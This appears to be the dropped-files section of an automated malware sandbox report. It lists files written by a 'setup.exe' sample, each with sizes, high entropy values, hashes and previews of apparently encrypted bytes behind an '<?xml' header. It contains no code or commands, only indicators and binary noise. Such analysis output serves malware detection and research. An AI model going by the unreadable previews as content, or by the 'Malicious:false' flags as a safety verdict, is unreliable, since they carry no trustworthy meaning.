.g76.-Xk...1....$..y.W,..W.....>Q_.c....N=..T....M.v...W.`.a.A.C._d...Y@..row/.../pC.FoK.`....C....k.<..o.r`k.m}...Lnc..cO..4....T.VR...(.t^........H......0F......$.7.os.V...8.B^9<?!.G...!.|...>.+..(...1..O..Q..5.s.yb...3.v.r.p....6.&.......~..a.....|..H"....\.Z3.$.G.[.UG.......`..s.^~...=....h~.B..V..l`M|.8..t..s...\.'....KAy.E..Zc.]1.]..........i[O......nd.9......M6^^...?.a...~.X.T....d.R...^xo....Bm.1..&5G.R.G..5..I..i..U.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1734
              Entropy (8bit):7.869947236438137
              Encrypted:false
              SSDEEP:48:GGrsyz2Z0hAkwmQx9yc8DfhMK0RFfCAyD2m8gCUCkuQ/D:GGoa2ZWBwDSf76CAy/pZCkRr
              MD5:5980F56E5FE9CD8A9D850014BFBCA637
              SHA1:4D2D9B9B62EE7FBEE5334E3F081D441090513E5C
              SHA-256:398EAC2722BF236AAFF9BAA4E0F83701F8732AAE17D581898C609D7A7F3FF65D
              SHA-512:49EC417A6603B816E8E49102AE2AAE995E20E491B432C30DA87250CD8A8F22887D1529C26D81A6165FC08B0FFAA45B78D1D97875248035D2D3DFC9325E2F8ECA
              Malicious:false
              Preview:<?xml.,..&|.z.......N...r5.a.x*._..dT...j..E....>6.E....|..-J...........z..[...M.=P.....,u..3g.Yi,X 1.fOq.c.(.8.1:.,...L...r...-.8qo<...Tor;.....m=.....__...)....12.9..*:D".%........{.}....@.>..@..IW(r.<<.Sl.6.}.v..a.P.'.(.....x]2..E...m:.>....B#.a..,.....K..`.8T....o..V.I.1.....*.....+..{.C.G..W.B.=......-.b2Y.*7......}..w.8.~.....X..DV.s..<.N..d..z......^..CoZ....X7}W0X7.;.S\......*.eet?..e.#..T.a...GzEZz..q.gl.IH|..].^...-Vg.x...\.e..G.....;...U..P/.Y.(....c..s(kt.e.!.0...s....B.._.]3k+.x.R...~.....6.t.r....C...mC..^.P.q..:.`.G&Q<.+..>M...z....\T..)..aL...V4.y..f.5.*.A..l..O?..%*n\v......1.....{-..O..(N..3......(&.x..V..iG.NWQ.I].B...v.>$.'.]..uE0U:^.[B.Cs..c0...S..P1..`..I..y>.,.....!(.c...r..\#K.kF?....oY`L._..U....I~*x.....ZV..[..:.\....oj.;..a8...-M3...og..x.k`.e.G..Ab.e..]t..t...'0.KC.3.D..v...;?..Z.g..d..`.F.W.fkK...?._....E*..:.}.6..?..r.+.E.4.@`..L.p...LR.v4..N..]rz6.....}&.....#...he...\..L..O.T.....A7....\q-...\.0..}.D../.6....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1704
              Entropy (8bit):7.897728558679306
              Encrypted:false
              SSDEEP:48:SeYrLlXFMqzEDhMqU+5+Td+BTOBWBr0xaLQfZenSh8/SQYD:W/MIEdy+oIwBWR0ALw8tE
              MD5:F167B441D14C084557E09DFA3964FB17
              SHA1:B215EA183E6684FC5BAA80D361348846B232A9CD
              SHA-256:48F3CE161F1EDDCB75867EE177C8CDBE8D63608443C725F5F0F6F894B9B91E3D
              SHA-512:8F2F46048E459527FFB9C3F227CDE7B9663BD4AB677BBC532B8C1D279A2843A8D93C16EF9F8A0BB22BCAE571897C1B0228E3B5ABE2DC0C40274EA21BB9038D60
              Malicious:false
              Preview:<?xmls+..v.....{....?c.d..w.\.0.h1 ,..jHO....j-xS.k-[.;V6q./V..`\N...c.E....t...#~O.T'..!68.v...H.'v....a.V...z..a........$......B..;..`.c....nW....!.t,Iu...c.j.NW...f..E....Q9.._...._.n.tx.%"rX.8|.i.A.D..1.C.>...)..~CwJ.Sg.|.Xx.?.. 9.^.m.x.3....jB.x......].{..V..Do.. ..O ....w...$gk..m..z.wt..m\O.....'.D/_.8.K...J%.Zn.C/...R.@B[<..[Z...5.....W.T...t....yzG......... ...(.u.4..qw..z-...l$.0...w.bv...g.....>...2.+....vb.mYz..3>.<..e.k....w+l.........O5.P.(|......."C.K.e.N..-A.'....M+.!M.I...|..v.7..X.A...2.=.6....U.......gfF..Z....$.7p.x...Y....6...wPE<.%.......;.jnl....Y..s.LJQ.(.zu..dm.2.t...S.ea.....$TUQ.p.t#......@....,.v...2.W.)v.s.<6.B..odmq*....}..sL...H....\{?....x$....O.8..J..^...Q.Y&..i{..H\B.X3!t0....tN.R;A5...u:Y`..l..hd.0G(.t.m..b ...?epD..>..:..[....1.Q..)..P(zs/}..O.<h..D&.}.K..P.u.&.)....D..`;g.?.F..@1...&.[c....5.. cY..G..wOK.o.?.t...E.Z.X.4b......K...)....X.\`.bm...........j.B..`...s3.l.X/.u.....GQ.....>.g...j.....z.]...~t..8
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1741
              Entropy (8bit):7.869658089556808
              Encrypted:false
              SSDEEP:48:D1z4FJALXn1N29O9IX6220/3SK/zFEw23K2I4D:Rz0Js1NSr9/mDfIk
              MD5:F5C0A48195724AE70634C63862438566
              SHA1:0FAB58CEBF71126662066E269121817E9D61EB33
              SHA-256:57819ED931546579C4F5D900765F80DA5168554E5E90B9ECC97DEE9589F49F1E
              SHA-512:0921D1D23F7FD19A2CD0676088810313D07A95D924A7E17517B660592CEE186D94E16BBB3C4B65E4090D5E5D53AA7AA1C484FEA7499C055070C1B8AAFB3440E3
              Malicious:false
              Preview:<?xml&4Y..zB..........H./......r4ff5.1\...b...3I>......:..r.#..Z..^..9..L..W...^.._7.HJ...n.....U%.e......pyR_u.edn..T.Oi;L...p_3.....MJ.....Cf....@...o.m...@A..U.s%@.\c._/.]..e.&.'ev(.Q.`P..c...:yfH.Cb...E......u.N$..h.V8y2X...\...1..=...!./p......n.I..H..V..:.`....u....D.d.H...6...nU1....r+..c.|..1{.[..V.d.)..lm..aX.X.{...f`.9...~.S..zl. ..Hq.x.S...;.2]...P9....9Y.......R..TN..Mx..@......_...D.,....6....W.`...&...=\.p.....v.?....<.:H!...4...x..}.....N.u.."-V..Eqa#....4+.......hc)...xT2.@.s...........l..:d......\.......m.....KQ....|..z[h.P...^......O.....M.......v....YM..E....;CY3$. ).JW.Y.S.%..3.@.[...^.....t...Q.*9..>{S4..&P..N..i.>.QQ...B...G.r1!p.F...p.Ue.E.E..C...wo1u.R.i....N.Gh.c.n.dP...' Q............2..8C..W.X/....]......x.E.7&...o......R?:..........,0..M&[.r..y51H})....q......\..x.A...&uE.....cJ<T...%.....U........N........ew.. F.xZ.L.xH....Eh........!a28P.....E......M)..x.i..iQ<..Pz.t...h......'YmO.tu_.h5..M....h.p.v...dO.t
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1693
              Entropy (8bit):7.881862450976871
              Encrypted:false
              SSDEEP:48:sYm+75g7bW7UCdv9xMmRWhpiMpYAyc+a9F/D:sYL4CdltRWbiMOAMw5
              MD5:4B6D50A62261259F823A02EC25EACE35
              SHA1:25BB16936E30B8CF4FC81D94D6DB93222EFD978B
              SHA-256:06C94FECC7CCD555AA82868A5F260EE17DB00B5DABA61DEB048C3335A3B2ED68
              SHA-512:40804D16B1C36016150981D99DEEA7041736084BF67644D7C70787BF8CB31665B12FFB31AB8D3404864369FEA661A58779E5CD84D6DB2A6D99FDC9B5A9918661
              Malicious:false
              Preview:<?xml.)e..^..l* I....VZ..3.....5M...T......H.m.......~..0.2........dh.J......Z../..<..)b.H..Z.....?x{..v.{..........{.m...|.4....*.[J..8..=e..r.A.3.b~.{.C....1o..D...<....>..b.i..\.......P...D..}.?.9.ACi.....4...V....{%v.....(..0]_B.....q~..N..2.|.e|....V.K.U.].g.Y]..X.w.W/r..v../H.~......D.w+..Q.H...%..,...I..~..LX....@.....w....:..r...DCuk..#Y.~?.1.B..0h?..:b.o.&C[...B...n...:..#..%&......0.....o...NSA.RR._..t.....&4.d;k\(.....M..J..........9....-z...W.$..k.M...\..I...^s5j.3.y.|.......}S..^.3...7.^P\u...@.....$.)y.J#o.Y ...EN....8.F0.9C.+...;Rf0..^........q..,.e.y.Jn7..|..n..?.Ic7.S..Rl....[Z..A3L.S.A.f.E.VJ.LQ.Q.6.j...v'[\4...O.g..:..}.......F..lVbC.|h....gn.E..>l...5.l.dc.6.!.D.>xd.........k.M.C..R.."F....`.f....$(..S....Y?.v.....^....J.R.)&...O.9...i.v8....m.Z...d/a.w.6.Q...M!...Ko.....q5.)^j..S....R...S..h[..%^..!.R....Km+...O.p..WB...n....c}..?...b....24`.n....j\..?...z..6.V....<....v....K{w..`.j..E....n....P. .vy...j
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.890953154211255
              Encrypted:false
              SSDEEP:48:i4UIFJlAGEVj6K8y0w6q/a3XnFyQ6pRMcavZMaG6JqJjpCU0aD:i49JlhEwhy0w6qSHb6IcavFHAbN7
              MD5:DBF44B22FD141371AEF966CA44F0DB0D
              SHA1:73B6E9541A80701CABAF3FB7F4B337C89B262DD9
              SHA-256:050B352D1AFEE178559E973EE52F2D514D7EF09E38CF49E60C2BE16283ACD768
              SHA-512:C6CFD54EF13370383DC534E7ABFA7AB31D1DC06F4272911AE80BC304E234D5FCC09A5BD9BAA1FA3E944F5BF74050ED839A425BE17B53EF626181B20474CB77A3
              Malicious:false
              Preview:<?xmlN..{.+..X.<...f...,....e.]B#t0...J.....sP..8..:q{fm.n..pz7.9......k}....2.]~Bz........xfq.H.U..kN.Y9..q.c0.G.&%oyZ.8...m5~}...l..0%...6..J@.I_]....VF%...A.#A..cw..m.C.2`b..jA....9..9. ...C...7.b..............5..H......w7._...q.p.k.a..*..j.<w.{s..=..R.u..A.Q.x.>.......+Ah3...p.TR._.}..?Z..+.I`ilO.....Q.".iM...%....(Jq..$E....EC|M.r..M..o"H,s....\*..,..lI.g.A...I7{.Hszf...o~o.......)..4..y....Q.9.{+3.8.....~.~...[..X...)iRG).-#.IM....#z..R{.]..E&Lv.A.^.R.(..Rf.........g..e.R......'c...N............z&r.Jy.G....M...6.t.umt...N5V...z.e9z.>..].a...g.sOP.S..|k..D..]M....@...jU|ABU..r..c....%..I:8..]U...&.Qq.......0y........,1hN...K...^S[......[O......p._{........B.C.-_@..k..).wSY....dQ.@1B.=lO.8.@..H....0...hK%0.T.5.=....~...upz.8....(...b..k..Hl..}<./.Z.e..~....Q.G}.?..F6..d@..?:..|].w:.4u.L...[.R..l...s....\qT..oq.C..&1.8...kb..|4......qk~;.e/a0.0.......|.W.<^j.........Ds..x[e..o.qJ.R~.....1[..{..m._n=....D.B]F.....Q.y.........|S"...../.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1693
              Entropy (8bit):7.873963888704089
              Encrypted:false
              SSDEEP:24:LnsWn6IkGbbdrafP7pqNRs96T+8jYSRnWwfCV6AKLrsxuEX+XHbD:LnF6hMofP7s/8aWwfCVSrsIEuX7D
              MD5:F4CDCE47701EA16FA5582398BE25ED40
              SHA1:11CA5D39ADA66ADDC68458FE913C71258387211D
              SHA-256:DD36D9433268B38E909AA02E1E2DC0BE8F68B024F164B0FB34F4725C743E79D8
              SHA-512:845C8F454F62266C92162B9D60D321D5562951E9CF8B638D0369478720E99CFAE9B3DEAA3C416E9563B56755491C77CA9CC4DF443E009D497BB00C3D55FF1C5F
              Malicious:false
              Preview:<?xml..W....!..B.....\...;........;../.[|.C.Z.xM..V.UNgK..l../1.{z..7....B..FMz....)s....:.t._.....{.....t".S...Bm80......H.......v.....mZ2:"R{..)....%...:.g..S..1...E...D.Bq9f..b...w.x......X.'.].B........h"..ga.X.....w.m....^uy..W...R.h.L.....8V...+..'...&ab2m..t..AY.=.CjX'..3.".,3V.n..T..<..,.1..;.SXU...Y...V.+.-....75.2].WU.~...asQ.D.%I?O..[.4.Ti.....!...I'..<`...`.].P..<2...~..$..t.a.....[%L)T.L.1..m...*.N.]..Y..A&.2..P....Q.'.1....0]..1.....1 T.....9.. V'.p..$.6..f...^.o.@.!B.E.g.....U....(..9....j.]..........R.c.8PCpW..k%..b2S..RK.&H...i..k.A.f...._[5...g....m....:1.q.b?%y..........;M.z...&..P..]....<...p.fw....P..+.Y`.2..ig..yc...vT.. Z.z.S.....\Ly....H.[K}P..~..M...J...J..v2..^... .E..9......50...2..2.@!.pD...M'....A..VG1...}/..m.b.1.(3.9F...S.}._&.. /"7t.S....4J..!.....n..../.WU..X.JH2.}...].ypz.d%).f.....V...?..|p}p.....H.Eut...h.9.Z..W.Qi.A-..[S.g.K..._g[Q.."...b.7M......4.u.,.+e.Y...~7.ah{..Q.y......&..se..#..+...../.....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1730
              Entropy (8bit):7.890249953354655
              Encrypted:false
              SSDEEP:48:z1R9A+nBTNVo03ZCQcRn7mxdpWspIpKXtQJD:zpI03ZCXsssW0E
              MD5:33DD49B82A906C956B98E8613D81BA91
              SHA1:0400419A2B148DC1D2D00434B282825C81E6D0E5
              SHA-256:7EC59C9C61FBE6AF1CE2A00EFEFA352C303CFB73FE505F3BFE6539AE08C9E271
              SHA-512:AE23EF2BF7B3AD5AE4B208B0162FC7204264A714AA6BC06A14EB2F9CE0D879087A647FE10FD88E99176F122244ECBDE35244224272404E9F4BFA93597478C40A
              Malicious:false
              Preview:<?xml.S..ra...:..I.S0<..;..6..Z.)i:.TAKi.!^....G..3.....f/T..M.h.O.l)Xm..!t.*tJ..c..r\O..(..-....$.7.4.A...z......I..H..z_..|..~.`PMye...T;4:.G.\:..,.....#.G...Nk...)V......4A....48.u_...<.K..*.._L...sW...3.q...T.fn......|..9z..mCv.c.....B.~.9.:..]c...&..i.4.w..H.07o....LU.]......|.e.GC..K..ey(.:.Q.^C.*.....o..|.,.*WL."!.;..)h..P,.r.q.X..!..!N...]0T..[.[....`Lt...J.q..C...:....L..m.w...3..T../....B.Q/..ce.%...j...(|.4..Pf.Y...Hn..7...>.w.K.i3....Q.V^.._.....Tz......hl..H.U".3.2......9.'.....Q1..9.^.@..r.....i.!..x..S..J./9..F.`.RE."Zu..~..I..C..:...Q\...2.4.....y...~=..X.....W.FZ.r....*2u......Og..Y.da..B..xY..|@..."".6S...O[Z..ToN.p"?'..fT#F..3E&g...._<.|...o.SM.7..(.O.+&t=..>..p......U7>...-........|.x.MM...u.h..%zG..*zf......*...3T....>...!].b.N2...fU.95.#..UyT~2.@.J....~.3k8.W..|.......#k..+.on./d+..b2-.@.i>M..`>$W.z.9.N.u..!n..a^.`.d{.dA...........CG.K.~N7.pC..c.a..P+1.\1.9Cg.p.0.z...g..7r.....)..Li]...y.lgO.I... .#r../%..p.9.N./o.r(...}..'
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1685
              Entropy (8bit):7.886195522196861
              Encrypted:false
              SSDEEP:24:N74yr20mtTfh89G0FXlBbrIdI+PVi78c9iA+iyjefl0dVGBPuoFZbSMnBUqqbD:N7Ifm9hjIGYi4pA+rjepucbvnBUqID
              MD5:9EAE05EE489312E2757799927225DB7F
              SHA1:77E4A3E06A56B2BE9C06CFA4A97BB7F6113A5F2C
              SHA-256:44BA783941D1C6D70D179C96925F033583307594DA232C61643AD5D51882BFE6
              SHA-512:8639EC7F8FB31EE676B9413AB0F7BC80CA77A3F8A27E1AB80107554744F8CC35BDBFC09715982E964F02586D461AA567BEC7903481E0C2AACCD8AE1AA14C1154
              Malicious:false
              Preview:<?xmll..Js....~...$...(..!..0..p.0..C:o...0.........GN...]......=.........m.\A..jM7\Ob... #f*7.)....|.L@.H.1&.. sD.F...U..`U.N..{.4/[r....J)......XL@.=~J.G..O[......<.!.M........... ..q[..'.\r.Y.G...nh.8Z;OV&.@b..$..".a.+.s..<...h.(.."...{..VK..=.....f...>....Y.....5.j..6....PFy0t`..-r.......P..V.*..F.+......}...;.\$U..c+.O.Y..a^.L..V.nO4&.6].h.:. h_'..b.......O.h..P.f...IT{....i..MH.....X4.43C...d......(~{......4!f*..}z..+.....1.#?.>|....|.%V8....h....Mx$:.Z..Z.p.;...^o..../l>...mB..5...-...x_..2.'b%-...Kq.....Q=.......j..l..S...%...~...XA#.lU.{.}.`v.R.J...=.|S.4...&..`...H.l{.&....N..>-...m.w....1.\.......b..iN.G.I.1.X.H.....;..|..<...u..N..0pL.p.j..nc[..\..t..*.-z...r.Q#..skeT...F...^...A..J^j+.c....7+...(..(.....7.A.....W.".c.z.}...H.Q..q{X..K*!...HqM...N'k...1.)..q....c..&...Y..{../....g?....... y.Eg?t{.[..O......f.[.:... . *..>........fkX..w...*%.s...J.X6.nC8..4:pl.Igr.=..(....iH~.#...5Z..qT.p.9.6......<3.b..v+.:,..../.b....;
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1722
              Entropy (8bit):7.880208046858098
              Encrypted:false
              SSDEEP:24:vO4YYQMHrzwFXzjrxBTlVvvxoTBKWb5evmVIQZv+dfNYGksFHS7riu2Gzrc/IZpL:v3Gwzwtj3xeVtF+1nnNIr5ncQlVD
              MD5:7C12B10534F7EC0321F95B288048A1C2
              SHA1:6143BA94D41FE3D434EABAA38610DCC972F96498
              SHA-256:7B8DCB8698C8D353F4CD4E7417FBE827005350BA7DDA5B38DE80B797CF599926
              SHA-512:977EC9A4EC42F436F223CFC3297CC2A3D633D2861C6E6F693F243431F1AB69D8209CE612B54D98574ED8DA344B15EC2083173823178949BDB1A41986BDD0010A
              Malicious:false
              Preview:<?xml.~<8.]yV.aO<T=.#...A]../......o.b.P..5k..<fkn......bB}.......g.n<(.h...^...q..N.....:4..@..sC.G.7Z...f~....7.xy.yI%Er.`L........ .C]@..$.~...K5@;...%f..3..........(=Y.d..DH...h.4.z?-`AT..r....{..b:...k..... .D..Y...".~.....S1.e]..3-..9!(F......Pb^.\.>3.....KR.Z..e4.8....?b......i..%H..ah......h-K...U...V.6..|.w1m...@B.p.|...C2Z..4.8t.QFs]..gj.N......fziQSC.9e...HXL..;..l.Y.`.. e....!n{"..S).v*.. ;.q..^..r..m.P3<..l.k..j.?...G....Q...>..p{....8U..D\}..l.:..W2d...^..k$.FkT.h7,.'.....NB....... ...dg......4...#.|U8..+...I...!......k.[....i.......'./.C.?..j9........8.7....Pvp.....q.1.).*..!.>s....9r...g..A.|..J.t.....,.LnH.\...s)"kS..#/.".<...4...l....r.6.....(.r../..,...q..or..w...U.C.......E..K.:..)....{d.t.............l[~I..Io.u...4.d..t....ZK...ZHm...q...q+.-.B...[.bY|.j....HV*.r..R.......+.ptZ>%.n...6.|.wx...2"..5....Wi.<|..E!.yt..=Ua.,+.y...x'.$...x..^,./_...z......@.^}r.8..$.@\.....C..7t....To.....m.Gk7Q(..g.. .......W......#[
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1695
              Entropy (8bit):7.874463721011945
              Encrypted:false
              SSDEEP:48:kyuAg8QXXh2J+dAm3FDgJmAb6XG/8npyjJhSDrPz0D:kdAgBHx3qJb6WEpyHkA
              MD5:5C0095C34CB48EA92AC8D3DB1367B663
              SHA1:DFDCCE80B2C9FCC41EA6A753D136B006C5C05EA3
              SHA-256:50B79278D1E2ACC4F7701D5C6ABB9B90889AFAA1D79D608FC02E6F18C6595632
              SHA-512:484B115713BCF33F0995AE44B95518E694CD11C78F1691DB7AC3E3E4C38745C87114CACC11302D38A1710D1730F7423D67F552423D8D5D7F4D0A82DE0ADFD3F6
              Malicious:false
              Preview:<?xmlXO_....x.._&gXT.L.......[!.4..6}.~1~....e...z....+...PK..EC....f#.'{.+..G...~........e^...ou..-..(..6.UE.5Cr..K.^.r..............uY.jI.D/.....V~.%TS.....h..RY>6...@........4....O8.P_a.n...)&...+...&.G..*.I2.^.. i..R....N....`.u....v..:.....\...S^.s.oG.J.........A...A5..D0..1U..Uh>U.Q..~...:#.B.!.E=.v.[.VY.T....f.p._....*+...g.2....vK.oO...h.T...0.5.......y..V@.X?3.....#L..Xu1.%P....:............L.o..+.x....CK.1..c.KN).V..f...$.-J.../'..|.Iyd.yA....~...|.e*1.......'......k./&.v......S0....HX.".,.S.....:..9..J7X.4..V..W.o.p....}.8c.$.............Z...^ .\...^.A.>.x3....O...c=R..:..K.A.._....lex.<~[.....'vN..-..T......g.~Z..3S..n..6Z.W.pj`I...0...R.\....0.+.3R$.GGuIL..zT...5tsw......v.{|].m_g'....z9..CA.<...de.......SB.MP.|,....F?.diSN..L*.....<.T:y.!.y..v1LznUt=Fi......".}.r+iy.V....q.,dg.3#y...j.z...NLgZ...So.q..}....-..d.....91...O. .X..3...m.8..'..c.......Y..x..@,..3C.Mu..ums.....d.&^.47.h.h.+}.`O..g../g..B._..jy|..u.j5..$......v..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1732
              Entropy (8bit):7.8748539522520264
              Encrypted:false
              SSDEEP:24:vrxJpEpvohCdjC0AEdK5d1J9y7KOKqGZdIZgqA+jU8QHrEJG9INGsRePvjKnrT/J:9bnECG85dD9iKOsdNqAhGUeQY/4uKMD
              MD5:5129D82D91868A2E5B0E194082D84248
              SHA1:F1D5C9B9C3AFA5AAB74D8064C04877615BC1F771
              SHA-256:4EEFBDE8CB9A8DAEDCB763537BCDC0BFA188BB1F8DF49E7027AC2BE0C292EC1E
              SHA-512:BB9DA8B721706D5EC7E75379BCD51C31791DB6FFE4B8849FFA6139CA20926D42431590AB415A3706BA3FC440D30554952B78CAE72A71448C81850563550C8867
              Malicious:false
              Preview:<?xml.'...&.#.......v...#0...j=.v..7g...........D8.Y...2......n.XS).V.~w..3..#q..{..*K{.y...T.W..@....d.C.6.. s..N569.mNh.\..)...i*'....&..q.w^........z....3 [#.3..2f.M..m.,....E...A...akI....H..t.....WQ-|s..J\...5tp..;&M.of.0..t..yWca....|.{r..tRD....5.C=..5`..r.'Z.K[s.c..v...d..0...se.P....1...2O...]...>Tq....*.....{|.m._3=..A.0..(..IeB.u.o....E....N...V.#cn.8......<.I......<R.tz...z6i..P..SR......1.aKF..=..............=..Y(.....d.......T.s..U....R.....:.@..+..D..D.0dBC.wk}.>...t.I5..X.~-lu.;(G..........\z.y..5.bTQo.7g...:y*n.O.[_..}.".....z...8<..hZ..d..."..Oc..3..[.d#.[^O.`....\......{......t..bTA.e.3..^.|..\.k.L..s.XD......2.....Ne.7..}QSA......F..iMB...*.9.!9..b...F.n4..K|oU...g...v..tv.W*...D..u....q.>..3d._'...<`.0..1..1....g...$.z^(..!8..Y..o.1~..A...E6.pP.#1.[{a]..O..g.r....a...*f...'.@;..v..!Y...l;.?...s..........Z......p..Qf(....I.t.3>.=%..PZ..#....~.ka..@.t...4....G.cu.f7.._.F......w...b....b|..5.,....vm....3 ..|. .
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1691
              Entropy (8bit):7.896728628145661
              Encrypted:false
              SSDEEP:24:2a3+6UwWkLlvTTz77QBPcRECj8AoCmyy2HhXIojxtp3aMebRKghztIpdWfrSfD5o:2+1hLRz77icRohChX7xeVKjFBZAD
              MD5:86FC6046FD1E493B328A6B8B178B0854
              SHA1:9506DDFA18D67372F9968EC696C6DAAE55CDD4A2
              SHA-256:E59A8FB303999B98A0DC77F414C77B82E65C64E49BD1A77262020743AC2DA474
              SHA-512:64CC84D30E46976FA651FEBDCDCD6D9EA5446CB986473CEFAE8DA52D53E512A8FA1D3458BB87E6E81327C839031CFBCF0BB6198FF451462021509FDCD47CFB42
              Malicious:false
              Preview:<?xml.*xL.i.V.o....-GvoC.0......CV}....X...mZ....M...}-.v..{Lz.@.!..........M.S...........nM..fA*p..U.Q...3.X...&..X7.g..E..j..}.P......~.4j.4W.3.<l.<YW-.]k.}....8....$wE.%..P.2..~.8N.h.e......;..F_p$bX...B...+K..4.P....<cG.=.N.. .0A].Ri.]JC....+$y.......Q.T.../.z%...6.*.B.+...3.T.......o.9..b,........h.gb^fq..K.D". J.pk.=.m%.o.Lo=..G...#.....MT.,.......j.A...N........@....~z.. ...u.a{.......3.">@..X.$+-....&..)....z..e9.oX.:.=....%2#1...+."......._.^Qmu...#?.^H...7.A(...E_..~.]..uy%.G...,{.^...6.......#..El..I.0N.\..U...h..w$...>.V.*...Z.`X...;.m..F..J....#k.$..P.=|{...6K.'...r..I..&....!..3d&A..$...u..........dyx....r0.a.6.Y...KR...\;.c.......P.....Ci.YB.15..(}.~....I..^Yt...`."=.#...PSg.(.....`.f.....5o..-.SZ....~....._..z.....8.+vj.'^p..8.d.n$......f..uv.>H.;2.....D>...z......4.D.z:.7....|^....N.F......$.<.d.9...)..X.KO...U......-.+.d0..Z.N..[.b3s!P....p;......j...4..i|..'.....XpQ...!Z..MZM.E.....aY?].<.B.y::...Q...WQ..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1728
              Entropy (8bit):7.876300401720143
              Encrypted:false
              SSDEEP:48:JPkRLgTIoe5L6xdL+4A0BnCBwasiMQgrwCnOD:JcRLguL6iZ/sCg0
              MD5:E3AB2C6D319FD4AB9486E0A4155F7D0B
              SHA1:81691DADBD21334C15EF1D8FFC6352BA7C493B08
              SHA-256:199B995FFEA320AF8D20DDEEC3CE16B84FCC73E8018A05FFFF6D2B009B0FB3A5
              SHA-512:425BA53F5D326C82B03E48D5EDE843EE1F5B664BC7C749053C3731C650060C997D4BF8B2AC1EEA7C233AE183E6C0EF06476FDCD60465D18AD37D98586A53EAE2
              Malicious:false
              Preview:<?xmle..y...&....SU./..,...."B.`...:g.Fpg.H...w(.u.=..ZL&...g..z....! ...J6=|..#..k7.wsP....^X..j.|.J.HL.y...ah.%r.i.....).<..K..jhI.....R.:.x...l.b..T.{..b.YU.a2..].{.!t...M...?.G.Q:..Lgx.u..6...<|.#gE....DL.!t.).M..E....)Ta.=...x.#<8....'MY(......'......A..UP..[M]Y3.9."J..`.w..d.../..<M1t?.........3..6UP...r.l.._8....v....F.....g..#...~...+...))M.x....kE.u..ck]....`..9_.5...."..Y...!.........zZ.s.u$..n.}.;.1q...q.B..5w..Gw..k.G...!.k....+.{P.r.R.z.........<.6.......N$.......K.....8)].6.....#t.....,..'.....WP...../.O.Ji....2..:.m..jT....n%//.....0..[d........3p%..H....H$...OY~.;n)>P..M..c.{....*..<..+sZL.Y.sE.......P.r...q...w8-+...xm@...4..C\$..%.P..8..[.o...S....%..c.\+.G..X....8.F.....%... !. ..u|...4L.V..&.;. G....U./.4Y.UJ..,.j...L..1...F.[...u._.EE-P.|.3....R-...!cn#....{E.8]..^...cG.._.......C.'..O.j|n...[...:.........|W..P...af.+..j...I......>&...h..&......@$M.^..x.KR....49..e4.8#T.i.GM.....],.NZW....'u:\......N`}..{<.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1701
              Entropy (8bit):7.889894550013055
              Encrypted:false
              SSDEEP:48:J/VfCaazSRHNZf+biPdrvPOrb2/hNAWLrhhqXxeAD:J/VfCaJRtskzOn2/hG8hhqwc
              MD5:0A3E818B08CC1CB3DE3B6A2285901FE4
              SHA1:09462BEDD3F39CBB12B4A2B0312FB48B8987C233
              SHA-256:194D5FA16400050529F8EA9DED905DE8F67539E56E149AF595844E79F2237EAD
              SHA-512:2529872F186D88776660F488AAC328BB672E4525AAAA1ECC809C80E75D6764226215E7E5B8FC796B57E555FF0747C5317589A0FE988ABCFD248720966A8C82C5
              Malicious:false
              Preview:<?xml......G.........9......V.W3..3.5.....i0...4{.h..z....[=z.8M.|L.Y.M.....lW.Q.6.R..';..H..Ul.js..zQ=..j..-K.K..K.N.#......D]m..05Z.]..(m. ...;3........................c..@....-L....\...Pc....U.5.AI....5...].F.D9....=4.9-..5..ZZ.....o.r<_...~.{.Y.PIEvF.a.*QY:.....T...Mt..Y.F.....%.LF....Y..z.........2..ZV,..?.F........hg7......^.3T>.....,...Kv.a..l]......e;.....)n..AC2..@.Oq..) ...=.%;J..@?..'.wQ....c.L..R...".;L.i..,{...h+`..C..]A....'...@~hym..a."vU.7D...zF=v.c6...'.....g.x.x.O.....}@.`..m[.c...Z. }....`....H.M....V.cB>.e.. .....f_..0.d..PL..6.c....O...v ...2c..P....J<.D..?.@..H.......[..z...Nq..[Rt+.Q...|3-p2...`<.....q.1.0k.)e...8..sdp....Lu\.p.?J0DN.$O..;.h-.].. ....k*.,z..o.@...8.+X....v...._.Y.'.mI+.nD.i1.C.`}.......Vb.....7.......'b......^..x2_fA....P..(.l.Z..4.z...~.f+.}....!.-k.&U...~kV!.[..k.<.^..?.D.f.~}}.o...NB...L..]g.jc.......C.d.,^..D...G~L...T..,x..#.i|Jw...w.+8...b'.....bd..4;.a..bl&-HJA......R.......8.5..Z.VLh..F...Z.....UX.u..'.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1738
              Entropy (8bit):7.908635819039068
              Encrypted:false
              SSDEEP:48:vmlP1DdJMW6mnizlmpgZXaZuw6P3nSclXCaT1bhGjQtmi7gND:vmFbJMWc2gpaZLqiEr1bE8tmn1
              MD5:0EBC3215728539F514617151DEF9F7A4
              SHA1:4F4557953CC5C56E700DC4A15F07EC8FC4089B10
              SHA-256:863FE59B11CBEE5B262680517E3351C2B3ABE8799EC69B6368EE2103AF77AE4C
              SHA-512:4C0D662E56C32C17EC716969EA6F5F6912F24C975A2F910A162704D7317157E1EB183DD45713448BC28B1EF703C258FAE15B8D5D9B4B623E8DE3426DB983C92A
              Malicious:false
